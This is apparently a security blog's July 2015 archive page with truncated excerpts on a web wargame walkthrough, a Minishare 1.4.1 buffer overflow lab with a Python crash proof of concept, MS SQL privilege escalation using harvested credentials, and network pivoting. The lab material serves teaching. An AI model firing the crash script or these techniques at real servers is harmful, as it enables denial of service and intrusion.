Showing posts from July, 2015

Whitehat Wargame websecurity challenges

Walkthrough of some web security challenges present at the Whitehat wargame:
https://wargame.whitehat.vn/Challenges/List/2

Note: this is the walkthrough of a challenge that is not present at the above link.
It is not a CTF.
Web Security Challenge Web001


Minishare 1.4.1 Buffer Overflow

You can download the server from:
https://www.dropbox.com/s/zhivgb79wtbce37/minishare-1.4.1.exe?dl=0

Exploit code in Ruby:
https://www.exploit-db.com/exploits/616/

The vulnerability is triggered by an overly long URL in the GET request.
Eg:- GET AAAAAAAAAAAAAAAA..... HTTP/1.1

Lab Setup:
1) Windows XP (I am using Windows XP SP1)
2) Immunity Debugger installed on the Windows XP machine.
3) Minishare 1.4.1 installed on Windows XP, running on port 80.
4) Kali Linux for scripting and exploiting.

Configure the victim: I have installed Minishare server 1.4.1 and it is listening for connections on port 80, as depicted below.


Generate a sample script to crash the server: We will try to smash the stack by sending a buffer of 2000 A's with the help of the following script.

#!/usr/bin/env python
# Crash PoC: sends a GET request whose URL is 2000 bytes long,
# which is the condition the text above describes as smashing the stack.
import socket, sys

if len(sys.argv) != 2:
    sys.exit("usage: %s <target-ip>" % sys.argv[0])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))   # Minishare is listening on port 80
buff = "GET "
buff += "A" * 2000             # oversized URL
buff += " HTTP/1.1\r\n\r\n"
s.send(buff.encode())          # encode() keeps this working on Python 3 as well as 2
s.close()


Execute the exploit. It is observed t…

MS SQL Pentest

In a few of my internal pentest engagements I was able to enumerate the IP and credentials of the database server, either by brute-forcing or by searching the code for the database connection string.

In the last 6 months I got the database credentials twice in client-side code, excluding the successful brute-force.

Previously, when I used to get the credentials, I would try to connect to the server using a local client. Eg. if I got credentials for MS SQL Server, then I would download some client for it and try to view the database.

This time I was not really interested in doing that. Instead I was thinking of escalating my privileges and doing something more than just viewing the database, because when I was reading the walk-through of Kioptrix it states that we can gain code execution using some commands executed in SQL.

So I googled ways to enumerate MSSQL and I found a very good link: https://www.offensive-security.com/metasploit-unleashed/admin-mssql-auxiliary-modules/



Port forwarding and pivoting

"This blog is already published on infosecinstitute"


In computer networking, port forwarding or port mapping is an application of network address translation (NAT) that redirects a communication request from one address and port number combination to another while the packets are traversing a network gateway, such as a router or firewall. This technique is most commonly used to make services on a host residing on a protected or masqueraded (internal) network available to hosts on the opposite side of the gateway (external network), by remapping the destination IP address and port number of the communication to an internal host.

More info on Port forwarding

Lab Setup: Requirements
        Three machines:
        1 - Attacker (Kali)
        2 - WinXP
        3 - Linux (Metasploitable or any vulnerable Linux machine).

VMware IP Setup
Attacker
        eth0 - (C Class IP) eg. 192.168.1.104
WinXP
        1 Ethernet - (C Class IP) eg. 192.168.1.131
        2 Ethernet - (A Class IP) e…